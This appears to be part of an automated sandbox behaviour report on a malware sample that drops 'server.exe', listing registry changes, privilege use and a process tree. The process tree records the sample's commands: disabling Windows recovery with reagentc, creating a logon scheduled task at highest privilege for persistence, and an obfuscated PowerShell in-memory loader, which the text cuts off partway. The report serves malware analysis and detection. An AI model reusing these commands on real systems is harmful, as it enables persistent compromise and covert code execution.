| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00DDF836BDF" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\cmd.exe
"cmd" /c reagentc.exe /disable
C:\Windows\SysWOW64\ReAgentc.exe
reagentc.exe /disable
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Users\Admin\AppData\Roaming\server.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9819.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Users\Admin\AppData\Roaming\server.exe"'
C:\Users\Admin\AppData\Roaming\server.exe
"C:\Users\Admin\AppData\Roaming\server.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c reagentc.exe /disable
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
C:\Windows\SysWOW64\ReAgentc.exe
reagentc.exe /disable
C:\Users\Admin\AppData\Roaming\server.exe
"C:\Users\Admin\AppData\Roaming\server.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rTyxuLWpLrFY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OGSRborOFjqhRg,[Parameter(Position=1)][Type]$PeCMsKsjLg)$GvBPegEQYWq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'ed'+'D'+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Mem'+'o'+'ry'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'eT'+[Char](121)+''+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+','+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+'c'+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+'l'+'as'+'s'+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+'l'+''+[Char](97)+'ss',[MulticastDelegate]);$GvBPegEQYWq.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+'e'+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+'H'+[Char](105)+'de'+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OGSRborOFjqhRg).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+''+'e'+''+'d'+'');$GvBPegEQYWq.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+'ke',''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+'i'+''+'g'+''+[Char](44)+'Ne'+[Char](119)+''+'S'+'lot'+','+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$PeCMsKsjLg,$OGSRborOFjqhRg).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'tim'+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output 